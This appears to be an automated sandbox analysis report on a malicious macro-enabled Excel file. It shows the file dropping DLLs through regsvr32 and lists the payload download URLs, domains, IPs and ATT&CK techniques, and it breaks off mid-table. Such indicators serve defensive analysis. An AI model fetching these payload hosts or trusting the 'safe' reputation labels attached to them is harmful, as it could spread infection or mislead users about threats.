            Valid AccountsScripting1Path InterceptionProcess Injection11Masquerading121OS Credential DumpingSecurity Software Discovery211Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel12Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
            Default AccountsExploitation for Client Execution43Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemoryProcess Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer14Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Process Injection11Security Account ManagerAccount Discovery1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Scripting1NTDSSystem Owner/User Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol124SIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptRegsvr321LSA SecretsRemote System Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain CredentialsSystem Network Configuration Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
            External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSyncFile and Directory Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
            Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc FilesystemSystem Information Discovery22Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 signatures2 2 Behavior Graph ID: 444803 Sample: Outfordelivery389402.xlsm Startdate: 06/07/2021 Architecture: WINDOWS Score: 100 35 Found malware configuration 2->35 37 Document exploit detected (drops PE files) 2->37 39 Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros) 2->39 41 6 other signatures 2->41 6 EXCEL.EXE 53 26 2->6         started        process3 dnsIp4 23 uppercilio.fun 104.21.55.83, 49169, 80 CLOUDFLARENETUS United States 6->23 25 voopeople.fun 172.67.194.117, 49168, 80 CLOUDFLARENETUS United States 6->25 27 thousandsyears.download 172.67.198.51, 49167, 80 CLOUDFLARENETUS United States 6->27 19 C:\Users\user\XTOWN.dll, PE32+ 6->19 dropped 21 C:\Users\user\AppData\Local\...\lsdfik[1].fml, PE32+ 6->21 dropped 43 Document exploit detected (creates forbidden files) 6->43 45 Document exploit detected (UrlDownloadToFile) 6->45 11 regsvr32.exe 6->11         started        14 regsvr32.exe 4 6->14         started        17 regsvr32.exe 6->17         started        file5 signatures6 process7 dnsIp8 47 System process connects to network (likely due to code injection or exploit) 11->47 49 Contains functionality to detect hardware virtualization (CPUID execution measurement) 11->49 51 Tries to detect virtualization through RDTSC time measurements 11->51 29 astrocycle.download 172.67.213.115, 49171, 80 CLOUDFLARENETUS United States 14->29 31 dr49lng3n1n2s.cloudfront.net 13.224.92.73, 443, 49170 AMAZON-02US United States 14->31 33 2 other IPs or domains 14->33 signatures9

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.

            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            No Antivirus matches

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
            http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
            http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
            http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
            http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
            http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
            https://www.honeycode.aws/?&amp;trk=el_a134p000003yC6YAAU&amp;trkCampaign=pac-edm-2020-honeycode-hom0%URL Reputationsafe
            https://www.honeycode.aws/?&amp;trk=el_a134p000003yC6YAAU&amp;trkCampaign=pac-edm-2020-honeycode-hom0%URL Reputationsafe
            https://www.honeycode.aws/?&amp;trk=el_a134p000003yC6YAAU&amp;trkCampaign=pac-edm-2020-honeycode-hom0%URL Reputationsafe
            http://ocsp.rootg2.amazontrust.com080%URL Reputationsafe
            http://ocsp.rootg2.amazontrust.com080%URL Reputationsafe
            http://ocsp.rootg2.amazontrust.com080%URL Reputationsafe
            http://voopeople.fun/div/44376,8555986111.jpg0%Avira URL Cloudsafe
            http://crl.sca1b.amazontrust.com/sca1b.crl00%URL Reputationsafe
            http://crl.sca1b.amazontrust.com/sca1b.crl00%URL Reputationsafe
            http://crl.sca1b.amazontrust.com/sca1b.crl00%URL Reputationsafe
            http://astrocycle.download/0%Avira URL Cloudsafe
            http://servername/isapibackend.dll0%Avira URL Cloudsafe
            http://ocsp.sca1b.amazontrust.com060%URL Reputationsafe
            http://ocsp.sca1b.amazontrust.com060%URL Reputationsafe
            http://ocsp.sca1b.amazontrust.com060%URL Reputationsafe
            http://crt.rootg2.amazontrust.com/root0%Avira URL Cloudsafe
            http://crl.rootca1.amazontrust.com/rootca1.crl00%URL Reputationsafe
            http://crl.rootca1.amazontrust.com/rootca1.crl00%URL Reputationsafe
            http://crl.rootca1.amazontrust.com/rootca1.crl00%URL Reputationsafe
            http://ocsp.rootca1.amazontrust.com0:0%Avira URL Cloudsafe
            http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
            http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
            http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
            http://crl.rootg2.amazontrust.com/rootg2.crl00%URL Reputationsafe
            http://crl.rootg2.amazontrust.com/rootg2.crl00%URL Reputationsafe
            http://crl.rootg2.amazontrust.com/rootg2.crl00%URL Reputationsafe
            http://uppercilio.fun/div/44376,8555986111.jpg0%Avira URL Cloudsafe
            http://o.ss2.us/00%URL Reputationsafe
            http://o.ss2.us/00%URL Reputationsafe
            http://o.ss2.us/00%URL Reputationsafe
            http://thousandsyears.download/div/44376,8555986111.jpg0%Avira URL Cloudsafe
            http://ocsp.entrust.net030%URL Reputationsafe
            http://ocsp.entrust.net030%URL Reputationsafe
            http://ocsp.entrust.net030%URL Reputationsafe
            http://crt.rootg2.amazontrust.com/rootg2.cer0=0%URL Reputationsafe
            http://crt.rootg2.amazontrust.com/rootg2.cer0=0%URL Reputationsafe
            http://crt.rootg2.amazontrust.com/rootg2.cer0=0%URL Reputationsafe
            http://www.icra.org/vocabulary/.0%URL Reputationsafe
            http://www.icra.org/vocabulary/.0%URL Reputationsafe
            http://www.icra.org/vocabulary/.0%URL Reputationsafe
            http://www.%s.comPA0%URL Reputationsafe
            http://www.%s.comPA0%URL Reputationsafe
            http://www.%s.comPA0%URL Reputationsafe
            http://ocsp.entrust.net0D0%URL Reputationsafe
            http://ocsp.entrust.net0D0%URL Reputationsafe
            http://ocsp.entrust.net0D0%URL Reputationsafe
            http://s.ss2.us/r.crl00%URL Reputationsafe
            http://s.ss2.us/r.crl00%URL Reputationsafe
            http://s.ss2.us/r.crl00%URL Reputationsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            uppercilio.fun
            		104.21.55.83
            		truefalse
              		unknown
              thousandsyears.download
              		172.67.198.51
              		truefalse
                		unknown
                voopeople.fun
                		172.67.194.117
                		truefalse
                  		unknown
                  astrocycle.download
                  		172.67.213.115
                  		truetrue
                    		unknown
                    dr49lng3n1n2s.cloudfront.net
                    		13.224.92.73
                    		truefalse
                      		high
                      aws.amazon.com
                      		unknown
                      		unknownfalse
                        		high

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        http://voopeople.fun/div/44376,8555986111.jpgfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://astrocycle.download/true
                        • Avira URL Cloud: safe
                        		unknown
                        http://uppercilio.fun/div/44376,8555986111.jpgfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://thousandsyears.download/div/44376,8555986111.jpgfalse
                        • Avira URL Cloud: safe
                        		unknown

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        https://twitter.com/awscloudregsvr32.exe, 00000004.00000002.2100781605.000000000343E000.00000004.00000001.sdmpfalse
                          		high
                          https://a0.awsstatic.com/libra/1.0.385/directoriesregsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmpfalse
                            		high
                            https://aws.amazon.com/terms/?nc1=f_prregsvr32.exe, 00000004.00000002.2100781605.000000000343E000.00000004.00000001.sdmpfalse
                              		high
                              https://dc.ads.linkedin.com/collect/?pid=3038&amp;fmt=gifregsvr32.exe, 00000004.00000002.2100781605.000000000343E000.00000004.00000001.sdmpfalse
                                		high
                                https://s0.awsstatic.com/en_US/nav/v3/panel-content/mobile/index.htmlregsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmpfalse
                                  		high
                                  https://aws.amazon.com/cn/regsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmpfalse
                                    		high
                                    http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0regsvr32.exe, 00000004.00000002.2096565303.0000000000277000.00000004.00000020.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.diginotar.nl/cps/pkioverheid0regsvr32.exe, 00000004.00000002.2096565303.0000000000277000.00000004.00000020.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    https://a0.awsstatic.com/libra-css/imagesregsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmpfalse
                                      		high
                                      https://a0.awsstatic.com/libra/1.0.385/librastandardlibregsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmpfalse
                                        		high
                                        https://a0.awsstatic.com/psf/nullregsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmpfalse
                                          		high
                                          https://aws.amazon.com/ar/regsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmpfalse
                                            		high
                                            https://www.honeycode.aws/?&amp;trk=el_a134p000003yC6YAAU&amp;trkCampaign=pac-edm-2020-honeycode-homregsvr32.exe, 00000004.00000003.2093230535.000000000343F000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            		unknown
                                            https://pages.awscloud.com/zillow-case-study?hp=tile&amp;story=zllwregsvr32.exe, 00000004.00000003.2093230535.000000000343F000.00000004.00000001.sdmpfalse
                                              		high
                                              https://pages.awscloud.com/communication-preferences?trk=homepageregsvr32.exe, 00000004.00000002.2100781605.000000000343E000.00000004.00000001.sdmpfalse
                                                		high
                                                http://ocsp.rootg2.amazontrust.com08regsvr32.exe, 00000004.00000002.2096565303.0000000000277000.00000004.00000020.sdmpfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                		unknown
                                                https://aws.amazon.com/cn/?nc1=h_lsregsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2100781605.000000000343E000.00000004.00000001.sdmpfalse
                                                  		high
                                                  https://portal.aws.amazon.com/gp/aws/developer/registration/index.html?nc1=f_ct&amp;src=defaultregsvr32.exe, 00000004.00000002.2100781605.000000000343E000.00000004.00000001.sdmpfalse
                                                    		high
                                                    https://aws.amazon.com/ru/regsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmpfalse
                                                      		high
                                                      https://aws.amazon.com/tw/?nc1=h_lsregsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2100781605.000000000343E000.00000004.00000001.sdmpfalse
                                                        		high
                                                        https://fls-na.amazon.com/1/action-impressions/1/OE/aws-mktg/action/awsm_:comp_DeprecatedBrowserregsvr32.exe, 00000004.00000002.2100781605.000000000343E000.00000004.00000001.sdmpfalse
                                                          		high
                                                          https://i18n-string.us-west-2.prod.pricing.aws.a2z.comregsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmpfalse
                                                            		high
                                                            https://aws.amazon.com/ko/regsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmpfalse
                                                              		high
                                                              https://aws.amazon.com/ru/?nc1=h_lsregsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2100781605.000000000343E000.00000004.00000001.sdmpfalse
                                                                		high
                                                                https://a0.awsstatic.com/libra-css/images/site/fav/favicon.icoregsvr32.exe, 00000004.00000003.2093230535.000000000343F000.00000004.00000001.sdmpfalse
                                                                  		high
                                                                  https://aws.amazon.com/es/regsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmpfalse
                                                                    		high
                                                                    http://crl.sca1b.amazontrust.com/sca1b.crl0regsvr32.exe, 00000004.00000002.2096565303.0000000000277000.00000004.00000020.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    https://docs.aws.amazon.com/index.html?nc2=h_ql_docregsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmpfalse
                                                                      		high
                                                                      https://aws.amazon.com/ar/?nc1=h_lsregsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2100781605.000000000343E000.00000004.00000001.sdmpfalse
                                                                        		high
                                                                        http://servername/isapibackend.dllregsvr32.exe, 00000003.00000002.2089572858.0000000001E80000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2096640594.0000000001CC0000.00000002.00000001.sdmp, regsvr32.exe, 00000005.00000002.2097273567.0000000001C30000.00000002.00000001.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		low
                                                                        https://aws.amazon.com/th/regsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmpfalse
                                                                          		high
                                                                          http://www.windows.com/pctv.regsvr32.exe, 00000004.00000002.2098287826.0000000003010000.00000002.00000001.sdmpfalse
                                                                            		high
                                                                            https://a0.awsstatic.com/pricing-calculator/js/1.0.2regsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmpfalse
                                                                              		high
                                                                              https://a0.awsstatic.com/plc/js/1.0.112/plcregsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmpfalse
                                                                                		high
                                                                                https://aws.amazon.com/marketplace/?nc2=h_moregsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmpfalse
                                                                                  		high
                                                                                  http://ocsp.sca1b.amazontrust.com06regsvr32.exe, 00000004.00000002.2096565303.0000000000277000.00000004.00000020.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  • URL Reputation: safe
                                                                                  • URL Reputation: safe
                                                                                  		unknown
                                                                                  https://amazon.com/regsvr32.exe, 00000004.00000002.2096565303.0000000000277000.00000004.00000020.sdmpfalse
                                                                                    		high
                                                                                    https://a0.awsstatic.com/libra-css/images/logos/aws_logo_smile_179x109.pngregsvr32.exe, 00000004.00000003.2093230535.000000000343F000.00000004.00000001.sdmpfalse
                                                                                      		high
                                                                                      https://console.aws.amazon.com/support/home/?nc2=h_ql_curegsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmpfalse
                                                                                        		high
                                                                                        http://crt.rootg2.amazontrust.com/rootregsvr32.exe, 00000004.00000002.2096551491.000000000024E000.00000004.00000020.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        		unknown
                                                                                        http://crl.rootca1.amazontrust.com/rootca1.crl0regsvr32.exe, 00000004.00000002.2096565303.0000000000277000.00000004.00000020.sdmpfalse
                                                                                        • URL Reputation: safe
                                                                                        • URL Reputation: safe
                                                                                        • URL Reputation: safe
                                                                                        		unknown
                                                                                        https://aws.amazon.com/search/regsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmpfalse
                                                                                          		high
                                                                                          https://console.aws.amazon.com/iam/home?nc2=h_m_sc#security_credentialregsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmpfalse
                                                                                            		high
                                                                                            https://aws.amazon.com/?nc2=h_lgregsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmpfalse
                                                                                              		high
                                                                                              http://ocsp.rootca1.amazontrust.com0:regsvr32.exe, 00000004.00000002.2096565303.0000000000277000.00000004.00000020.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              		unknown
                                                                                              https://console.aws.amazon.com/support/home/?nc1=f_drregsvr32.exe, 00000004.00000002.2100781605.000000000343E000.00000004.00000001.sdmpfalse
                                                                                                		high
                                                                                                https://aws.amazon.com/fr/regsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmpfalse
                                                                                                  		high
                                                                                                  http://windowsmedia.com/redir/services.asp?WMPFriendly=trueregsvr32.exe, 00000004.00000002.2100037178.00000000031F7000.00000002.00000001.sdmpfalse
                                                                                                  • URL Reputation: safe
                                                                                                  • URL Reputation: safe
                                                                                                  • URL Reputation: safe
                                                                                                  		unknown
                                                                                                  https://console.aws.amazon.com/console/home?nc1=f_ct&amp;src=footer-signin-mobileregsvr32.exe, 00000004.00000002.2100781605.000000000343E000.00000004.00000001.sdmpfalse
                                                                                                    		high
                                                                                                    https://aws.amazon.com/vi/regsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmpfalse
                                                                                                      		high
                                                                                                      https://www.twitch.tv/awsregsvr32.exe, 00000004.00000002.2100781605.000000000343E000.00000004.00000001.sdmpfalse
                                                                                                        		high
                                                                                                        https://aws.amazon.com/marketplace/?nc2=h_ql_mpregsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmpfalse
                                                                                                          		high
                                                                                                          https://aws.amazon.com/searchregsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmpfalse
                                                                                                            		high
                                                                                                            https://a0.awsstatic.com/libra/1.0.385/libra-head.jsregsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmpfalse
                                                                                                              		high
                                                                                                              http://crl.rootg2.amazontrust.com/rootg2.crl0regsvr32.exe, 00000004.00000002.2096565303.0000000000277000.00000004.00000020.sdmpfalse
                                                                                                              • URL Reputation: safe
                                                                                                              • URL Reputation: safe
                                                                                                              • URL Reputation: safe
                                                                                                              		unknown
                                                                                                              http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.regsvr32.exe, 00000004.00000002.2097777850.0000000002C20000.00000002.00000001.sdmpfalse
                                                                                                                		high
                                                                                                                https://a0.awsstatic.com/da/js/1.0.47/aws-da.jsregsvr32.exe, 00000004.00000002.2100781605.000000000343E000.00000004.00000001.sdmpfalse
                                                                                                                  		high
                                                                                                                  https://aws.amazon.com/tw/regsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmpfalse
                                                                                                                    		high
                                                                                                                    https://aws.amazon.com/tr/?nc1=h_lsregsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2100781605.000000000343E000.00000004.00000001.sdmpfalse
                                                                                                                      		high
                                                                                                                      https://console.aws.amazon.com/?nc2=h_m_mcregsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmpfalse
                                                                                                                        		high
                                                                                                                        https://aws.amazon.com/fr/?nc1=h_lsregsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2100781605.000000000343E000.00000004.00000001.sdmpfalse
                                                                                                                          		high
                                                                                                                          http://o.ss2.us/0regsvr32.exe, 00000004.00000002.2096565303.0000000000277000.00000004.00000020.sdmpfalse
                                                                                                                          • URL Reputation: safe
                                                                                                                          • URL Reputation: safe
                                                                                                                          • URL Reputation: safe
                                                                                                                          		unknown
                                                                                                                          https://aws.amazon.com/search/?searchQuery=regsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmpfalse
                                                                                                                            		high
                                                                                                                            https://a0.awsstatic.com/libra-search/1.0.13/jsregsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmpfalse
                                                                                                                              		high
                                                                                                                              https://aws.amazon.com/privacy/?nc1=f_prregsvr32.exe, 00000004.00000002.2100781605.000000000343E000.00000004.00000001.sdmpfalse
                                                                                                                                		high
                                                                                                                                https://aws.amazon.com/pt/?nc1=h_lsregsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2100781605.000000000343E000.00000004.00000001.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  https://aws.amazon.com/jp/?nc1=h_lsregsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2100781605.000000000343E000.00000004.00000001.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    http://crl.entrust.net/2048ca.crl0regsvr32.exe, 00000004.00000002.2096565303.0000000000277000.00000004.00000020.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      https://aws.amazon.com/regsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2093230535.000000000343F000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2096551491.000000000024E000.00000004.00000020.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        http://www.msnbc.com/news/ticker.txtregsvr32.exe, 00000004.00000002.2098287826.0000000003010000.00000002.00000001.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          https://a0.awsstatic.com/libra-css/images/site/touch-icon-ipad-144-smile.pngregsvr32.exe, 00000004.00000003.2093230535.000000000343F000.00000004.00000001.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            https://a0.awsstatic.com/s_code/js/3.0/awshome_s_code.jsregsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              https://aws.amazon.com/podcasts/aws-podcast/regsvr32.exe, 00000004.00000002.2100781605.000000000343E000.00000004.00000001.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                http://ocsp.entrust.net03regsvr32.exe, 00000004.00000002.2096565303.0000000000277000.00000004.00000020.sdmpfalse
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                • URL Reputation: safe
                                                                                                                                                		unknown
                                                                                                                                                https://aws.amazon.com/jp/regsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmpfalse
                                                                                                                                                  		high
                                                                                                                                                  http://crt.rootg2.amazontrust.com/rootg2.cer0=regsvr32.exe, 00000004.00000002.2096565303.0000000000277000.00000004.00000020.sdmpfalse
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                  		unknown
                                                                                                                                                  https://aws.amazon.com/pt/regsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmpfalse
                                                                                                                                                    		high
                                                                                                                                                    https://aws.amazon.com/lrregsvr32.exe, 00000004.00000003.2093300984.0000000000276000.00000004.00000001.sdmpfalse
                                                                                                                                                      		high
                                                                                                                                                      https://aws.amazon.com/?nc1=h_lsregsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2100781605.000000000343E000.00000004.00000001.sdmpfalse
                                                                                                                                                        		high
                                                                                                                                                        https://s0.awsstatic.com/en_US/nav/v3/panel-content/desktop/index.htmlregsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmpfalse
                                                                                                                                                          		high
                                                                                                                                                          https://a0.awsstatic.com/libra-css/css/1.0.382regsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmpfalse
                                                                                                                                                            		high
                                                                                                                                                            https://aws.amazon.com/es/?nc1=h_lsregsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2100781605.000000000343E000.00000004.00000001.sdmpfalse
                                                                                                                                                              		high
                                                                                                                                                              http://www.icra.org/vocabulary/.regsvr32.exe, 00000004.00000002.2100037178.00000000031F7000.00000002.00000001.sdmpfalse
                                                                                                                                                              • URL Reputation: safe
                                                                                                                                                              • URL Reputation: safe
                                                                                                                                                              • URL Reputation: safe
                                                                                                                                                              		unknown
                                                                                                                                                              https://d1.awsstatic.comregsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmpfalse
                                                                                                                                                                		high
                                                                                                                                                                https://aws.amazon.com/de/regsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmpfalse
                                                                                                                                                                  		high
                                                                                                                                                                  http://investor.msn.com/regsvr32.exe, 00000004.00000002.2098287826.0000000003010000.00000002.00000001.sdmpfalse
                                                                                                                                                                    		high
                                                                                                                                                                    https://phd.aws.amazon.com/?nc2=h_m_scregsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmpfalse
                                                                                                                                                                      		high
                                                                                                                                                                      https://a0.awsstatic.com/libra/1.0.385/libra-cardsuiregsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmpfalse
                                                                                                                                                                        		high
                                                                                                                                                                        https://aws.amazon.com/id/?nc1=h_lsregsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2100781605.000000000343E000.00000004.00000001.sdmpfalse
                                                                                                                                                                          		high
                                                                                                                                                                          https://a0.awsstatic.com/libra-css/images/logos/aws_logo_smile_1200x630.pngregsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmpfalse
                                                                                                                                                                            		high
                                                                                                                                                                            http://www.%s.comPAregsvr32.exe, 00000004.00000002.2097777850.0000000002C20000.00000002.00000001.sdmpfalse
                                                                                                                                                                            • URL Reputation: safe
                                                                                                                                                                            • URL Reputation: safe
                                                                                                                                                                            • URL Reputation: safe
                                                                                                                                                                            		low
                                                                                                                                                                            https://portal.aws.amazon.com/gp/aws/developer/registration/index.html?nc2=h_ct&amp;src=defaultregsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmpfalse
                                                                                                                                                                              		high
                                                                                                                                                                              https://a0.awsstatic.comregsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmpfalse
                                                                                                                                                                                		high
                                                                                                                                                                                http://ocsp.entrust.net0Dregsvr32.exe, 00000004.00000002.2096565303.0000000000277000.00000004.00000020.sdmpfalse
                                                                                                                                                                                • URL Reputation: safe
                                                                                                                                                                                • URL Reputation: safe
                                                                                                                                                                                • URL Reputation: safe
                                                                                                                                                                                		unknown
                                                                                                                                                                                https://pages.awscloud.com/fico-case-study.html?hp=tile&amp;story=ficoregsvr32.exe, 00000004.00000003.2093230535.000000000343F000.00000004.00000001.sdmpfalse
                                                                                                                                                                                  		high
                                                                                                                                                                                  http://s.ss2.us/r.crl0regsvr32.exe, 00000004.00000002.2096565303.0000000000277000.00000004.00000020.sdmpfalse
                                                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                                                  • URL Reputation: safe
                                                                                                                                                                                  		unknown

                                                                                                                                                                                  Contacted IPs

                                                                                                                                                                                  • No. of IPs < 25%
                                                                                                                                                                                  • 25% < No. of IPs < 50%
                                                                                                                                                                                  • 50% < No. of IPs < 75%
                                                                                                                                                                                  • 75% < No. of IPs

                                                                                                                                                                                  Public

                                                                                                                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                  172.67.198.51
                                                                                                                                                                                  		thousandsyears.downloadUnited States
                                                                                                                                                                                  		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                  13.224.92.73
                                                                                                                                                                                  		dr49lng3n1n2s.cloudfront.netUnited States
                                                                                                                                                                                  		16509AMAZON-02USfalse
                                                                                                                                                                                  104.21.55.83
                                                                                                                                                                                  		uppercilio.funUnited States
                                                                                                                                                                                  		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                  172.67.213.115
                                                                                                                                                                                  		astrocycle.downloadUnited States
                                                                                                                                                                                  		13335CLOUDFLARENETUStrue
                                                                                                                                                                                  172.67.194.117
